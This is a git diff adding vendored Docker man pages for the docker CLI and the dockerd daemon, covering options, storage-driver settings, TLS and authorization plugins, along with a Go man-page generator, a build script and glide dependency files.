Dowideit diff --git a/vendor/github.com/docker/docker/man/docker.1.md b/vendor/github.com/docker/docker/man/docker.1.md new file mode 100644 index 0000000000..2a96184439 --- /dev/null +++ b/vendor/github.com/docker/docker/man/docker.1.md @@ -0,0 +1,237 @@ +% DOCKER(1) Docker User Manuals +% William Henry +% APRIL 2014 +# NAME +docker \- Docker image and container command line interface + +# SYNOPSIS +**docker** [OPTIONS] COMMAND [ARG...] + +**docker** daemon [--help|...] + +**docker** [--help|-v|--version] + +# DESCRIPTION +is a client for interacting with the daemon (see **dockerd(8)**) through the CLI. + +The Docker CLI has over 30 commands. The commands are listed below and each has +its own man page which explain usage and arguments. + +To see the man page for a command run **man docker **. + +# OPTIONS +**--help** + Print usage statement + +**--config**="" + Specifies the location of the Docker client configuration files. The default is '~/.docker'. + +**-D**, **--debug**=*true*|*false* + Enable debug mode. Default is false. + +**-H**, **--host**=[*unix:///var/run/docker.sock*]: tcp://[host]:[port][path] to bind or +unix://[/path/to/socket] to use. + The socket(s) to bind to in daemon mode specified using one or more + tcp://host:port/path, unix:///path/to/socket, fd://* or fd://socketfd. + If the tcp port is not specified, then it will default to either `2375` when + `--tls` is off, or `2376` when `--tls` is on, or `--tlsverify` is specified. + +**-l**, **--log-level**="*debug*|*info*|*warn*|*error*|*fatal*" + Set the logging level. Default is `info`. + +**--tls**=*true*|*false* + Use TLS; implied by --tlsverify. Default is false. + +**--tlscacert**=*~/.docker/ca.pem* + Trust certs signed only by this CA. + +**--tlscert**=*~/.docker/cert.pem* + Path to TLS certificate file. + +**--tlskey**=*~/.docker/key.pem* + Path to TLS key file. + +**--tlsverify**=*true*|*false* + Use TLS and verify the remote (daemon: verify client, client: verify daemon). + Default is false. + +**-v**, **--version**=*true*|*false* + Print version information and quit. Default is false. + +# COMMANDS +**attach** + Attach to a running container + See **docker-attach(1)** for full documentation on the **attach** command. + +**build** + Build an image from a Dockerfile + See **docker-build(1)** for full documentation on the **build** command. + +**commit** + Create a new image from a container's changes + See **docker-commit(1)** for full documentation on the **commit** command. + +**cp** + Copy files/folders between a container and the local filesystem + See **docker-cp(1)** for full documentation on the **cp** command. + +**create** + Create a new container + See **docker-create(1)** for full documentation on the **create** command. + +**diff** + Inspect changes on a container's filesystem + See **docker-diff(1)** for full documentation on the **diff** command. + +**events** + Get real time events from the server + See **docker-events(1)** for full documentation on the **events** command. + +**exec** + Run a command in a running container + See **docker-exec(1)** for full documentation on the **exec** command. + +**export** + Stream the contents of a container as a tar archive + See **docker-export(1)** for full documentation on the **export** command. + +**history** + Show the history of an image + See **docker-history(1)** for full documentation on the **history** command. + +**images** + List images + See **docker-images(1)** for full documentation on the **images** command. + +**import** + Create a new filesystem image from the contents of a tarball + See **docker-import(1)** for full documentation on the **import** command. + +**info** + Display system-wide information + See **docker-info(1)** for full documentation on the **info** command. + +**inspect** + Return low-level information on a container or image + See **docker-inspect(1)** for full documentation on the **inspect** command. + +**kill** + Kill a running container (which includes the wrapper process and everything +inside it) + See **docker-kill(1)** for full documentation on the **kill** command. + +**load** + Load an image from a tar archive + See **docker-load(1)** for full documentation on the **load** command. + +**login** + Log in to a Docker Registry + See **docker-login(1)** for full documentation on the **login** command. + +**logout** + Log the user out of a Docker Registry + See **docker-logout(1)** for full documentation on the **logout** command. + +**logs** + Fetch the logs of a container + See **docker-logs(1)** for full documentation on the **logs** command. + +**pause** + Pause all processes within a container + See **docker-pause(1)** for full documentation on the **pause** command. + +**port** + Lookup the public-facing port which is NAT-ed to PRIVATE_PORT + See **docker-port(1)** for full documentation on the **port** command. + +**ps** + List containers + See **docker-ps(1)** for full documentation on the **ps** command. + +**pull** + Pull an image or a repository from a Docker Registry + See **docker-pull(1)** for full documentation on the **pull** command. + +**push** + Push an image or a repository to a Docker Registry + See **docker-push(1)** for full documentation on the **push** command. + +**rename** + Rename a container. + See **docker-rename(1)** for full documentation on the **rename** command. + +**restart** + Restart one or more containers + See **docker-restart(1)** for full documentation on the **restart** command. + +**rm** + Remove one or more containers + See **docker-rm(1)** for full documentation on the **rm** command. + +**rmi** + Remove one or more images + See **docker-rmi(1)** for full documentation on the **rmi** command. + +**run** + Run a command in a new container + See **docker-run(1)** for full documentation on the **run** command. + +**save** + Save an image to a tar archive + See **docker-save(1)** for full documentation on the **save** command. + +**search** + Search for an image in the Docker index + See **docker-search(1)** for full documentation on the **search** command. + +**start** + Start a container + See **docker-start(1)** for full documentation on the **start** command. + +**stats** + Display a live stream of one or more containers' resource usage statistics + See **docker-stats(1)** for full documentation on the **stats** command. + +**stop** + Stop a container + See **docker-stop(1)** for full documentation on the **stop** command. + +**tag** + Tag an image into a repository + See **docker-tag(1)** for full documentation on the **tag** command. + +**top** + Lookup the running processes of a container + See **docker-top(1)** for full documentation on the **top** command. + +**unpause** + Unpause all processes within a container + See **docker-unpause(1)** for full documentation on the **unpause** command. + +**version** + Show the Docker version information + See **docker-version(1)** for full documentation on the **version** command. + +**wait** + Block until a container stops, then print its exit code + See **docker-wait(1)** for full documentation on the **wait** command. + + +# RUNTIME EXECUTION OPTIONS + +Use the **--exec-opt** flags to specify options to the execution driver. +The following options are available: + +#### native.cgroupdriver +Specifies the management of the container's `cgroups`. You can specify `cgroupfs` +or `systemd`. If you specify `systemd` and it is not available, the system errors +out. + +#### Client +For specific client examples please see the man page for the specific Docker +command. For example: + + man docker-run + +# HISTORY +April 2014, Originally compiled by William Henry (whenry at redhat dot com) based on docker.com source material and internal work. diff --git a/vendor/github.com/docker/docker/man/dockerd.8.md b/vendor/github.com/docker/docker/man/dockerd.8.md new file mode 100644 index 0000000000..761dc6b9be --- /dev/null +++ b/vendor/github.com/docker/docker/man/dockerd.8.md @@ -0,0 +1,710 @@ +% DOCKER(8) Docker User Manuals +% Shishir Mahajan +% SEPTEMBER 2015 +# NAME +dockerd - Enable daemon mode + +# SYNOPSIS +**dockerd** +[**--add-runtime**[=*[]*]] +[**--api-cors-header**=[=*API-CORS-HEADER*]] +[**--authorization-plugin**[=*[]*]] +[**-b**|**--bridge**[=*BRIDGE*]] +[**--bip**[=*BIP*]] +[**--cgroup-parent**[=*[]*]] +[**--cluster-store**[=*[]*]] +[**--cluster-advertise**[=*[]*]] +[**--cluster-store-opt**[=*map[]*]] +[**--config-file**[=*/etc/docker/daemon.json*]] +[**--containerd**[=*SOCKET-PATH*]] +[**-D**|**--debug**] +[**--default-gateway**[=*DEFAULT-GATEWAY*]] +[**--default-gateway-v6**[=*DEFAULT-GATEWAY-V6*]] +[**--default-runtime**[=*runc*]] +[**--default-ulimit**[=*[]*]] +[**--disable-legacy-registry**] +[**--dns**[=*[]*]] +[**--dns-opt**[=*[]*]] +[**--dns-search**[=*[]*]] +[**--exec-opt**[=*[]*]] +[**--exec-root**[=*/var/run/docker*]] +[**--experimental**[=*false*]] +[**--fixed-cidr**[=*FIXED-CIDR*]] +[**--fixed-cidr-v6**[=*FIXED-CIDR-V6*]] +[**-G**|**--group**[=*docker*]] +[**-g**|**--graph**[=*/var/lib/docker*]] +[**-H**|**--host**[=*[]*]] +[**--help**] +[**--icc**[=*true*]] +[**--init**[=*false*]] +[**--init-path**[=*""*]] +[**--insecure-registry**[=*[]*]] +[**--ip**[=*0.0.0.0*]] +[**--ip-forward**[=*true*]] +[**--ip-masq**[=*true*]] +[**--iptables**[=*true*]] +[**--ipv6**] +[**--isolation**[=*default*]] +[**-l**|**--log-level**[=*info*]] +[**--label**[=*[]*]] +[**--live-restore**[=*false*]] +[**--log-driver**[=*json-file*]] +[**--log-opt**[=*map[]*]] +[**--mtu**[=*0*]] +[**--max-concurrent-downloads**[=*3*]] +[**--max-concurrent-uploads**[=*5*]] +[**-p**|**--pidfile**[=*/var/run/docker.pid*]] +[**--raw-logs**] +[**--registry-mirror**[=*[]*]] +[**-s**|**--storage-driver**[=*STORAGE-DRIVER*]] +[**--seccomp-profile**[=*SECCOMP-PROFILE-PATH*]] +[**--selinux-enabled**] +[**--shutdown-timeout**[=*15*]] +[**--storage-opt**[=*[]*]] +[**--swarm-default-advertise-addr**[=*IP|INTERFACE*]] +[**--tls**] +[**--tlscacert**[=*~/.docker/ca.pem*]] +[**--tlscert**[=*~/.docker/cert.pem*]] +[**--tlskey**[=*~/.docker/key.pem*]] +[**--tlsverify**] +[**--userland-proxy**[=*true*]] +[**--userland-proxy-path**[=*""*]] +[**--userns-remap**[=*default*]] + +# DESCRIPTION +**dockerd** is used for starting the Docker daemon (i.e., to command the daemon +to manage images, containers etc). So **dockerd** is a server, as a daemon. + +To run the Docker daemon you can specify **dockerd**. +You can check the daemon options using **dockerd --help**. +Daemon options should be specified after the **dockerd** keyword in the +following format. + +**dockerd [OPTIONS]** + +# OPTIONS + +**--add-runtime**=[] + Runtimes can be registered with the daemon either via the +configuration file or using the `--add-runtime` command line argument. + + The following is an example adding 2 runtimes via the configuration: + +```json +{ + "default-runtime": "runc", + "runtimes": { + "runc": { + "path": "runc" + }, + "custom": { + "path": "/usr/local/bin/my-runc-replacement", + "runtimeArgs": [ + "--debug" + ] + } + } +} +``` + + This is the same example via the command line: + +```bash +$ sudo dockerd --add-runtime runc=runc --add-runtime custom=/usr/local/bin/my-runc-replacement +``` + + **Note**: defining runtime arguments via the command line is not supported. + +**--api-cors-header**="" + Set CORS headers in the Engine API. Default is cors disabled. Give urls like + "http://foo, http://bar, ...". Give "*" to allow all. + +**--authorization-plugin**="" + Set authorization plugins to load + +**-b**, **--bridge**="" + Attach containers to a pre\-existing network bridge; use 'none' to disable + container networking + +**--bip**="" + Use the provided CIDR notation address for the dynamically created bridge + (docker0); Mutually exclusive of \-b + +**--cgroup-parent**="" + Set parent cgroup for all containers. Default is "/docker" for fs cgroup + driver and "system.slice" for systemd cgroup driver. + +**--cluster-store**="" + URL of the distributed storage backend + +**--cluster-advertise**="" + Specifies the 'host:port' or `interface:port` combination that this + particular daemon instance should use when advertising itself to the cluster. + The daemon is reached through this value. + +**--cluster-store-opt**="" + Specifies options for the Key/Value store. + +**--config-file**="/etc/docker/daemon.json" + Specifies the JSON file path to load the configuration from. + +**--containerd**="" + Path to containerd socket. + +**-D**, **--debug**=*true*|*false* + Enable debug mode. Default is false. + +**--default-gateway**="" + IPv4 address of the container default gateway; this address must be part of + the bridge subnet (which is defined by \-b or \--bip) + +**--default-gateway-v6**="" + IPv6 address of the container default gateway + +**--default-runtime**="runc" + Set default runtime if there're more than one specified by `--add-runtime`. + +**--default-ulimit**=[] + Default ulimits for containers. + +**--disable-legacy-registry**=*true*|*false* + Disable contacting legacy registries + +**--dns**="" + Force Docker to use specific DNS servers + +**--dns-opt**="" + DNS options to use. + +**--dns-search**=[] + DNS search domains to use. + +**--exec-opt**=[] + Set runtime execution options. See RUNTIME EXECUTION OPTIONS. + +**--exec-root**="" + Path to use as the root of the Docker execution state files. Default is + `/var/run/docker`. + +**--experimental**="" + Enable the daemon experimental features. + +**--fixed-cidr**="" + IPv4 subnet for fixed IPs (e.g., 10.20.0.0/16); this subnet must be nested in + the bridge subnet (which is defined by \-b or \-\-bip). + +**--fixed-cidr-v6**="" + IPv6 subnet for global IPv6 addresses (e.g., 2a00:1450::/64) + +**-G**, **--group**="" + Group to assign the unix socket specified by -H when running in daemon mode. + use '' (the empty string) to disable setting of a group. Default is `docker`. + +**-g**, **--graph**="" + Path to use as the root of the Docker runtime. Default is `/var/lib/docker`. + +**-H**, **--host**=[*unix:///var/run/docker.sock*]: tcp://[host:port] to bind or +unix://[/path/to/socket] to use. + The socket(s) to bind to in daemon mode specified using one or more + tcp://host:port, unix:///path/to/socket, fd://* or fd://socketfd. + +**--help** + Print usage statement + +**--icc**=*true*|*false* + Allow unrestricted inter\-container and Docker daemon host communication. If + disabled, containers can still be linked together using the **--link** option + (see **docker-run(1)**). Default is true. + +**--init** + Run an init process inside containers for signal forwarding and process + reaping. + +**--init-path** + Path to the docker-init binary. + +**--insecure-registry**=[] + Enable insecure registry communication, i.e., enable un-encrypted and/or + untrusted communication. + + List of insecure registries can contain an element with CIDR notation to + specify a whole subnet. Insecure registries accept HTTP and/or accept HTTPS + with certificates from unknown CAs. + + Enabling `--insecure-registry` is useful when running a local registry. + However, because its use creates security vulnerabilities it should ONLY be + enabled for testing purposes. For increased security, users should add their + CA to their system's list of trusted CAs instead of using + `--insecure-registry`. + +**--ip**="" + Default IP address to use when binding container ports. Default is `0.0.0.0`. + +**--ip-forward**=*true*|*false* + Enables IP forwarding on the Docker host. The default is `true`. This flag + interacts with the IP forwarding setting on your host system's kernel. If + your system has IP forwarding disabled, this setting enables it. If your + system has IP forwarding enabled, setting this flag to `--ip-forward=false` + has no effect. + + This setting will also enable IPv6 forwarding if you have both + `--ip-forward=true` and `--fixed-cidr-v6` set. Note that this may reject + Router Advertisements and interfere with the host's existing IPv6 + configuration. For more information, please consult the documentation about + "Advanced Networking - IPv6". + +**--ip-masq**=*true*|*false* + Enable IP masquerading for bridge's IP range. Default is true. + +**--iptables**=*true*|*false* + Enable Docker's addition of iptables rules. Default is true. + +**--ipv6**=*true*|*false* + Enable IPv6 support. Default is false. Docker will create an IPv6-enabled + bridge with address fe80::1 which will allow you to create IPv6-enabled + containers. Use together with `--fixed-cidr-v6` to provide globally routable + IPv6 addresses. IPv6 forwarding will be enabled if not used with + `--ip-forward=false`. This may collide with your host's current IPv6 + settings. For more information please consult the documentation about + "Advanced Networking - IPv6". + +**--isolation**="*default*" + Isolation specifies the type of isolation technology used by containers. + Note that the default on Windows server is `process`, and the default on + Windows client is `hyperv`. Linux only supports `default`. + +**-l**, **--log-level**="*debug*|*info*|*warn*|*error*|*fatal*" + Set the logging level. Default is `info`. + +**--label**="[]" + Set key=value labels to the daemon (displayed in `docker info`) + +**--live-restore**=*false* + Enable live restore of running containers when the daemon starts so that they + are not restarted. This option is applicable only for docker daemon running + on Linux host. + +**--log-driver**="*json-file*|*syslog*|*journald*|*gelf*|*fluentd*|*awslogs*|*splunk*|*etwlogs*|*gcplogs*|*none*" + Default driver for container logs. Default is `json-file`. + **Warning**: `docker logs` command works only for `json-file` logging driver. + +**--log-opt**=[] + Logging driver specific options. + +**--mtu**=*0* + Set the containers network mtu. Default is `0`. + +**--max-concurrent-downloads**=*3* + Set the max concurrent downloads for each pull. Default is `3`. + +**--max-concurrent-uploads**=*5* + Set the max concurrent uploads for each push. Default is `5`. + +**-p**, **--pidfile**="" + Path to use for daemon PID file. Default is `/var/run/docker.pid` + +**--raw-logs** + Output daemon logs in full timestamp format without ANSI coloring. If this + flag is not set, the daemon outputs condensed, colorized logs if a terminal + is detected, or full ("raw") output otherwise. + +**--registry-mirror**=*://* + Prepend a registry mirror to be used for image pulls. May be specified + multiple times. + +**-s**, **--storage-driver**="" + Force the Docker runtime to use a specific storage driver. + +**--seccomp-profile**="" + Path to seccomp profile. + +**--selinux-enabled**=*true*|*false* + Enable selinux support. Default is false. + +**--shutdown-timeout**=*15* + Set the shutdown timeout value in seconds. Default is `15`. + +**--storage-opt**=[] + Set storage driver options. See STORAGE DRIVER OPTIONS. + +**--swarm-default-advertise-addr**=*IP|INTERFACE* + Set default address or interface for swarm to advertise as its + externally-reachable address to other cluster members. This can be a + hostname, an IP address, or an interface such as `eth0`. A port cannot be + specified with this option. + +**--tls**=*true*|*false* + Use TLS; implied by --tlsverify. Default is false. + +**--tlscacert**=*~/.docker/ca.pem* + Trust certs signed only by this CA. + +**--tlscert**=*~/.docker/cert.pem* + Path to TLS certificate file. + +**--tlskey**=*~/.docker/key.pem* + Path to TLS key file. + +**--tlsverify**=*true*|*false* + Use TLS and verify the remote (daemon: verify client, client: verify daemon). + Default is false. + +**--userland-proxy**=*true*|*false* + Rely on a userland proxy implementation for inter-container and + outside-to-container loopback communications. Default is true. + +**--userland-proxy-path**="" + Path to the userland proxy binary. + +**--userns-remap**=*default*|*uid:gid*|*user:group*|*user*|*uid* + Enable user namespaces for containers on the daemon. Specifying "default" + will cause a new user and group to be created to handle UID and GID range + remapping for the user namespace mappings used for contained processes. + Specifying a user (or uid) and optionally a group (or gid) will cause the + daemon to lookup the user and group's subordinate ID ranges for use as the + user namespace mappings for contained processes. + +# STORAGE DRIVER OPTIONS + +Docker uses storage backends (known as "graphdrivers" in the Docker +internals) to create writable containers from images. Many of these +backends use operating system level technologies and can be +configured. + +Specify options to the storage backend with **--storage-opt** flags. The +backends that currently take options are *devicemapper*, *zfs* and *btrfs*. +Options for *devicemapper* are prefixed with *dm*, options for *zfs* +start with *zfs* and options for *btrfs* start with *btrfs*. + +Specifically for devicemapper, the default is a "loopback" model which +requires no pre-configuration, but is extremely inefficient. Do not +use it in production. + +To make the best use of Docker with the devicemapper backend, you must +have a recent version of LVM. Use `lvm` to create a thin pool; for +more information see `man lvmthin`. Then, use `--storage-opt +dm.thinpooldev` to tell the Docker engine to use that pool for +allocating images and container snapshots. + +## Devicemapper options + +#### dm.thinpooldev + +Specifies a custom block storage device to use for the thin pool. + +If using a block device for device mapper storage, it is best to use `lvm` +to create and manage the thin-pool volume. This volume is then handed to Docker +to exclusively create snapshot volumes needed for images and containers. + +Managing the thin-pool outside of Engine makes for the most feature-rich +method of having Docker utilize device mapper thin provisioning as the +backing storage for Docker containers. The highlights of the lvm-based +thin-pool management feature include: automatic or interactive thin-pool +resize support, dynamically changing thin-pool features, automatic thinp +metadata checking when lvm activates the thin-pool, etc. + +As a fallback if no thin pool is provided, loopback files are +created. Loopback is very slow, but can be used without any +pre-configuration of storage. It is strongly recommended that you do +not use loopback in production. Ensure your Engine daemon has a +`--storage-opt dm.thinpooldev` argument provided. + +Example use: + + $ dockerd \ + --storage-opt dm.thinpooldev=/dev/mapper/thin-pool + +#### dm.basesize + +Specifies the size to use when creating the base device, which limits +the size of images and containers. The default value is 10G. Note, +thin devices are inherently "sparse", so a 10G device which is mostly +empty doesn't use 10 GB of space on the pool. However, the filesystem +will use more space for base images the larger the device +is. + +The base device size can be increased at daemon restart which will allow +all future images and containers (based on those new images) to be of the +new base device size. + +Example use: `dockerd --storage-opt dm.basesize=50G` + +This will increase the base device size to 50G. The Docker daemon will throw an +error if existing base device size is larger than 50G. A user can use +this option to expand the base device size however shrinking is not permitted. + +This value affects the system-wide "base" empty filesystem that may already +be initialized and inherited by pulled images. Typically, a change to this +value requires additional steps to take effect: + + $ sudo service docker stop + $ sudo rm -rf /var/lib/docker + $ sudo service docker start + +Example use: `dockerd --storage-opt dm.basesize=20G` + +#### dm.fs + +Specifies the filesystem type to use for the base device. The +supported options are `ext4` and `xfs`. The default is `ext4`. + +Example use: `dockerd --storage-opt dm.fs=xfs` + +#### dm.mkfsarg + +Specifies extra mkfs arguments to be used when creating the base device. + +Example use: `dockerd --storage-opt "dm.mkfsarg=-O ^has_journal"` + +#### dm.mountopt + +Specifies extra mount options used when mounting the thin devices. + +Example use: `dockerd --storage-opt dm.mountopt=nodiscard` + +#### dm.use_deferred_removal + +Enables use of deferred device removal if `libdm` and the kernel driver +support the mechanism. + +Deferred device removal means that if device is busy when devices are +being removed/deactivated, then a deferred removal is scheduled on +device. And devices automatically go away when last user of the device +exits. + +For example, when a container exits, its associated thin device is removed. If +that device has leaked into some other mount namespace and can't be removed, +the container exit still succeeds and this option causes the system to schedule +the device for deferred removal. It does not wait in a loop trying to remove a +busy device. + +Example use: `dockerd --storage-opt dm.use_deferred_removal=true` + +#### dm.use_deferred_deletion + +Enables use of deferred device deletion for thin pool devices. By default, +thin pool device deletion is synchronous. Before a container is deleted, the +Docker daemon removes any associated devices. If the storage driver can not +remove a device, the container deletion fails and daemon returns. + +`Error deleting container: Error response from daemon: Cannot destroy container` + +To avoid this failure, enable both deferred device deletion and deferred +device removal on the daemon. + +`dockerd --storage-opt dm.use_deferred_deletion=true --storage-opt dm.use_deferred_removal=true` + +With these two options enabled, if a device is busy when the driver is +deleting a container, the driver marks the device as deleted. Later, when the +device isn't in use, the driver deletes it. + +In general it should be safe to enable this option by default. It will help +when unintentional leaking of mount point happens across multiple mount +namespaces. + +#### dm.loopdatasize + +**Note**: This option configures devicemapper loopback, which should not be +used in production. + +Specifies the size to use when creating the loopback file for the "data" device +which is used for the thin pool. The default size is 100G. The file is sparse, +so it will not initially take up this much space. + +Example use: `dockerd --storage-opt dm.loopdatasize=200G` + +#### dm.loopmetadatasize + +**Note**: This option configures devicemapper loopback, which should not be +used in production. + +Specifies the size to use when creating the loopback file for the "metadata" +device which is used for the thin pool. The default size is 2G. The file is +sparse, so it will not initially take up this much space. + +Example use: `dockerd --storage-opt dm.loopmetadatasize=4G` + +#### dm.datadev + +(Deprecated, use `dm.thinpooldev`) + +Specifies a custom blockdevice to use for data for a Docker-managed thin pool. +It is better to use `dm.thinpooldev` - see the documentation for it above for +discussion of the advantages. + +#### dm.metadatadev + +(Deprecated, use `dm.thinpooldev`) + +Specifies a custom blockdevice to use for metadata for a Docker-managed thin +pool. See `dm.datadev` for why this is deprecated. + +#### dm.blocksize + +Specifies a custom blocksize to use for the thin pool. The default +blocksize is 64K. + +Example use: `dockerd --storage-opt dm.blocksize=512K` + +#### dm.blkdiscard + +Enables or disables the use of `blkdiscard` when removing devicemapper devices. +This is disabled by default due to the additional latency, but as a special +case with loopback devices it will be enabled, in order to re-sparsify the +loopback file on image/container removal. + +Disabling this on loopback can lead to *much* faster container removal times, +but it also prevents the space used in `/var/lib/docker` directory from being +returned to the system for other use when containers are removed. + +Example use: `dockerd --storage-opt dm.blkdiscard=false` + +#### dm.override_udev_sync_check + +By default, the devicemapper backend attempts to synchronize with the `udev` +device manager for the Linux kernel. This option allows disabling that +synchronization, to continue even though the configuration may be buggy. + +To view the `udev` sync support of a Docker daemon that is using the +`devicemapper` driver, run: + + $ docker info + [...] + Udev Sync Supported: true + [...] + +When `udev` sync support is `true`, then `devicemapper` and `udev` can +coordinate the activation and deactivation of devices for containers. + +When `udev` sync support is `false`, a race condition occurs between the +`devicemapper` and `udev` during create and cleanup. The race condition results +in errors and failures. (For information on these failures, see +[docker#4036](https://github.com/docker/docker/issues/4036)) + +To allow the `docker` daemon to start, regardless of whether `udev` sync is +`false`, set `dm.override_udev_sync_check` to true: + + $ dockerd --storage-opt dm.override_udev_sync_check=true + +When this value is `true`, the driver continues and simply warns you the errors +are happening. + +**Note**: The ideal is to pursue a `docker` daemon and environment that does +support synchronizing with `udev`. For further discussion on this topic, see +[docker#4036](https://github.com/docker/docker/issues/4036). +Otherwise, set this flag for migrating existing Docker daemons to a daemon with +a supported environment. + +#### dm.min_free_space + +Specifies the min free space percent in a thin pool require for new device +creation to succeed. This check applies to both free data space as well +as free metadata space. Valid values are from 0% - 99%. Value 0% disables +free space checking logic. If user does not specify a value for this option, +the Engine uses a default value of 10%. + +Whenever a new a thin pool device is created (during `docker pull` or during +container creation), the Engine checks if the minimum free space is available. +If the space is unavailable, then device creation fails and any relevant +`docker` operation fails. + +To recover from this error, you must create more free space in the thin pool to +recover from the error. You can create free space by deleting some images and +containers from tge thin pool. You can also add more storage to the thin pool. + +To add more space to an LVM (logical volume management) thin pool, just add +more storage to the group container thin pool; this should automatically +resolve any errors. If your configuration uses loop devices, then stop the +Engine daemon, grow the size of loop files and restart the daemon to resolve +the issue. + +Example use:: `dockerd --storage-opt dm.min_free_space=10%` + +#### dm.xfs_nospace_max_retries + +Specifies the maximum number of retries XFS should attempt to complete IO when +ENOSPC (no space) error is returned by underlying storage device. + +By default XFS retries infinitely for IO to finish and this can result in +unkillable process. To change this behavior one can set xfs_nospace_max_retries +to say 0 and XFS will not retry IO after getting ENOSPC and will shutdown +filesystem. + +Example use: + + $ sudo dockerd --storage-opt dm.xfs_nospace_max_retries=0 + + +## ZFS options + +#### zfs.fsname + +Set zfs filesystem under which docker will create its own datasets. By default +docker will pick up the zfs filesystem where docker graph (`/var/lib/docker`) +is located. + +Example use: `dockerd -s zfs --storage-opt zfs.fsname=zroot/docker` + +## Btrfs options + +#### btrfs.min_space + +Specifies the mininum size to use when creating the subvolume which is used for +containers. If user uses disk quota for btrfs when creating or running a +container with **--storage-opt size** option, docker should ensure the **size** +cannot be smaller than **btrfs.min_space**. + +Example use: `docker daemon -s btrfs --storage-opt btrfs.min_space=10G` + +# CLUSTER STORE OPTIONS + +The daemon uses libkv to advertise the node within the cluster. Some Key/Value +backends support mutual TLS, and the client TLS settings used by the daemon can +be configured using the **--cluster-store-opt** flag, specifying the paths to +PEM encoded files. + +#### kv.cacertfile + +Specifies the path to a local file with PEM encoded CA certificates to trust + +#### kv.certfile + +Specifies the path to a local file with a PEM encoded certificate. This +certificate is used as the client cert for communication with the Key/Value +store. + +#### kv.keyfile + +Specifies the path to a local file with a PEM encoded private key. This +private key is used as the client key for communication with the Key/Value +store. + +# Access authorization + +Docker's access authorization can be extended by authorization plugins that +your organization can purchase or build themselves. You can install one or more +authorization plugins when you start the Docker `daemon` using the +`--authorization-plugin=PLUGIN_ID` option. + +```bash +dockerd --authorization-plugin=plugin1 --authorization-plugin=plugin2,... +``` + +The `PLUGIN_ID` value is either the plugin's name or a path to its +specification file. The plugin's implementation determines whether you can +specify a name or path. Consult with your Docker administrator to get +information about the plugins available to you. + +Once a plugin is installed, requests made to the `daemon` through the command +line or Docker's Engine API are allowed or denied by the plugin. If you have +multiple plugins installed, at least one must allow the request for it to +complete. + +For information about how to create an authorization plugin, see [authorization +plugin](https://docs.docker.com/engine/extend/authorization/) section in the +Docker extend section of this documentation. + + +# HISTORY +Sept 2015, Originally compiled by Shishir Mahajan +based on docker.com source material and internal work. diff --git a/vendor/github.com/docker/docker/man/generate.go b/vendor/github.com/docker/docker/man/generate.go new file mode 100644 index 0000000000..f21614d94a --- /dev/null +++ b/vendor/github.com/docker/docker/man/generate.go @@ -0,0 +1,43 @@ +package main + +import ( + "fmt" + "os" + + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/command/commands" + "github.com/docker/docker/pkg/term" + "github.com/spf13/cobra" + "github.com/spf13/cobra/doc" +) + +func generateManPages(path string) error { + header := &doc.GenManHeader{ + Title: "DOCKER", + Section: "1", + Source: "Docker Community", + } + + stdin, stdout, stderr := term.StdStreams() + dockerCli := command.NewDockerCli(stdin, stdout, stderr) + cmd := &cobra.Command{Use: "docker"} + commands.AddCommands(cmd, dockerCli) + + cmd.DisableAutoGenTag = true + return doc.GenManTreeFromOpts(cmd, doc.GenManTreeOptions{ + Header: header, + Path: path, + CommandSeparator: "-", + }) +} + +func main() { + path := "/tmp" + if len(os.Args) > 1 { + path = os.Args[1] + } + fmt.Printf("Generating man pages into %s\n", path) + if err := generateManPages(path); err != nil { + fmt.Fprintf(os.Stderr, "Failed to generate man pages: %s\n", err.Error()) + } +} diff --git a/vendor/github.com/docker/docker/man/generate.sh b/vendor/github.com/docker/docker/man/generate.sh new file mode 100755 index 0000000000..e4126ba4ac --- /dev/null +++ b/vendor/github.com/docker/docker/man/generate.sh @@ -0,0 +1,15 @@ +#!/bin/bash +# +# Generate man pages for docker/docker +# + +set -eu + +mkdir -p ./man/man1 + +# Generate man pages from cobra commands +go build -o /tmp/gen-manpages ./man +/tmp/gen-manpages ./man/man1 + +# Generate legacy pages from markdown +./man/md2man-all.sh -q diff --git a/vendor/github.com/docker/docker/man/glide.lock b/vendor/github.com/docker/docker/man/glide.lock new file mode 100644 index 0000000000..5ec765a4c6 --- /dev/null +++ b/vendor/github.com/docker/docker/man/glide.lock @@ -0,0 +1,52 @@ +hash: ead3ea293a6143fe41069ebec814bf197d8c43a92cc7666b1f7e21a419b46feb +updated: 2016-06-20T21:53:35.420817456Z +imports: +- name: github.com/BurntSushi/toml + version: f0aeabca5a127c4078abb8c8d64298b147264b55 +- name: github.com/cpuguy83/go-md2man + version: a65d4d2de4d5f7c74868dfa9b202a3c8be315aaa + subpackages: + - md2man +- name: github.com/fsnotify/fsnotify + version: 30411dbcefb7a1da7e84f75530ad3abe4011b4f8 +- name: github.com/hashicorp/hcl + version: da486364306ed66c218be9b7953e19173447c18b + subpackages: + - hcl/ast + - hcl/parser + - hcl/token + - json/parser + - hcl/scanner + - hcl/strconv + - json/scanner + - json/token +- name: github.com/inconshreveable/mousetrap + version: 76626ae9c91c4f2a10f34cad8ce83ea42c93bb75 +- name: github.com/magiconair/properties + version: c265cfa48dda6474e208715ca93e987829f572f8 +- name: github.com/mitchellh/mapstructure + version: d2dd0262208475919e1a362f675cfc0e7c10e905 +- name: github.com/russross/blackfriday + version: 1d6b8e9301e720b08a8938b8c25c018285885438 +- name: github.com/shurcooL/sanitized_anchor_name + version: 10ef21a441db47d8b13ebcc5fd2310f636973c77 +- name: github.com/spf13/cast + version: 27b586b42e29bec072fe7379259cc719e1289da6 +- name: github.com/spf13/jwalterweatherman + version: 33c24e77fb80341fe7130ee7c594256ff08ccc46 +- name: github.com/spf13/pflag + version: dabebe21bf790f782ea4c7bbd2efc430de182afd +- name: github.com/spf13/viper + version: c1ccc378a054ea8d4e38d8c67f6938d4760b53dd +- name: golang.org/x/sys + version: 62bee037599929a6e9146f29d10dd5208c43507d + subpackages: + - unix +- name: gopkg.in/yaml.v2 + version: a83829b6f1293c91addabc89d0571c246397bbf4 +- name: github.com/spf13/cobra + repo: https://github.com/dnephin/cobra + subpackages: + - doc + version: v1.3 +devImports: [] diff --git a/vendor/github.com/docker/docker/man/glide.yaml b/vendor/github.com/docker/docker/man/glide.yaml new file mode 100644 index 0000000000..e99b2670d8 --- /dev/null +++ b/vendor/github.com/docker/docker/man/glide.yaml @@ -0,0 +1,12 @@ +package: github.com/docker/docker/man +import: +- package: github.com/cpuguy83/go-md2man + subpackages: + - md2man +- package: github.com/inconshreveable/mousetrap +- package: github.com/spf13/pflag +- package: github.com/spf13/viper +- package: github.com/spf13/cobra + repo: https://github.com/dnephin/cobra + subpackages: + - doc diff --git 